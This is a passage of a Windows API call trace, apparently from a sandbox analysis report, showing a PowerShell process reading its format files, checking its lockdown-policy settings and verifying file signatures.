	[0044.710] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x4000
	[0044.710] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.710] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x5000
	[0044.710] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.710] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x6000
	[0044.710] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x3b6, lpOverlapped=0x0) returned 1
	[0044.710] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x63b6
	[0044.710] ReadFile (in: hFile=0x3d8, lpBuffer=0x150473d2b00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x150473d2b00*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.711] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0044.711] GetSystemDirectoryW (in: lpBuffer=0x1505f3b9410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.711] CoTaskMemFree (pv=0x1505f3b9410) 
	[0044.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0044.711] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0044.711] WldpGetLockdownPolicy () returned 0x0
	[0044.711] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.711] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0044.711] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0044.711] RegCloseKey (hKey=0x5b8) returned 0x0
	[0044.711] CloseHandle (hObject=0x3d8) returned 1
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0044.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x150473e2dd0 | out: lpFileInformation=0x150473e2dd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63b6)) returned 1
	[0044.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0044.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63b6)) returned 1
	[0044.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0044.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63b6)) returned 1
	[0044.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0044.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0044.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0044.712] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.713] GetFileType (hFile=0x3d8) returned 0x1
	[0044.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0044.713] GetFileType (hFile=0x3d8) returned 0x1
	[0044.713] WTGetSignatureInfo () returned 0x0
	[0044.746] CertDuplicateCertificateContext (pCertContext=0x1505fba69a0) returned 0x1505fba69a0
	[0044.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5e4) returned 0x0
	[0044.747] RegQueryValueExW (in: hKey=0x5e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.747] RegQueryValueExW (in: hKey=0x5e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x150473e39f8, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.747] RegCloseKey (hKey=0x5e4) returned 0x0
	[0044.747] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06bd0
	[0044.747] CoTaskMemAlloc (cb=0x50) returned 0x1505f465220
	[0044.747] WinVerifyTrust () returned 0x0
	[0044.747] CoTaskMemFree (pv=0x1505f465220) 
	[0044.747] CoTaskMemFree (pv=0x1505fb06bd0) 
	[0044.747] CertFreeCertificateContext (pCertContext=0x1505fba69a0) returned 1
	[0044.747] CloseHandle (hObject=0x3d8) returned 1
	[0044.748] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9c90
	[0044.748] GetSystemDirectoryW (in: lpBuffer=0x1505f3b9c90, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.748] CoTaskMemFree (pv=0x1505f3b9c90) 
	[0044.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0044.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0044.749] WldpGetLockdownPolicy () returned 0x0
	[0044.749] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0044.749] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0044.749] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.749] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x9690ff38, Data2=0xbfe6, Data3=0x4f48, Data4=([0]=0x89, [1]=0x3f, [2]=0x1a, [3]=0xac, [4]=0xad, [5]=0x1d, [6]=0xef, [7]=0xde))) returned 0x0
	[0044.749] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8d58e486, Data2=0xb306, Data3=0x45bc, Data4=([0]=0x89, [1]=0x9f, [2]=0x20, [3]=0x84, [4]=0xb8, [5]=0xf8, [6]=0x35, [7]=0x64))) returned 0x0
	[0044.750] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf0023b92, Data2=0xf351, Data3=0x4e62, Data4=([0]=0xa3, [1]=0x98, [2]=0x3e, [3]=0xb2, [4]=0x2, [5]=0xc9, [6]=0x7b, [7]=0x4e))) returned 0x0
	[0044.750] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xacc5f8be, Data2=0x1a7c, Data3=0x4dd2, Data4=([0]=0xaa, [1]=0xd3, [2]=0x2b, [3]=0x4e, [4]=0x75, [5]=0x37, [6]=0xa8, [7]=0x8))) returned 0x0
	[0044.750] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd389b133, Data2=0xe9bc, Data3=0x4440, Data4=([0]=0x98, [1]=0x12, [2]=0xdf, [3]=0xf5, [4]=0x42, [5]=0x92, [6]=0xe5, [7]=0x85))) returned 0x0
	[0044.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.750] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0044.750] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.750] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0044.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0044.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0044.750] WldpGetLockdownPolicy () returned 0x0
	[0044.750] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.750] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0044.751] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0044.751] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0044.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0044.751] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.751] GetFileType (hFile=0x3d8) returned 0x1
	[0044.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.751] GetFileType (hFile=0x3d8) returned 0x1
	[0044.751] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0044.751] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.752] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0044.752] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.752] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0044.752] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.752] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0044.752] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.753] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x4000
	[0044.753] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.753] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x5000
	[0044.753] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.753] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x6000
	[0044.753] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.753] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x7000
	[0044.753] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.754] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x8000
	[0044.754] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.754] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x9000
	[0044.754] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.754] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xa000
	[0044.754] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.754] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xb000
	[0044.754] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.755] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xc000
	[0044.755] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.755] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xd000
	[0044.755] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.755] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xe000
	[0044.755] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.755] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xf000
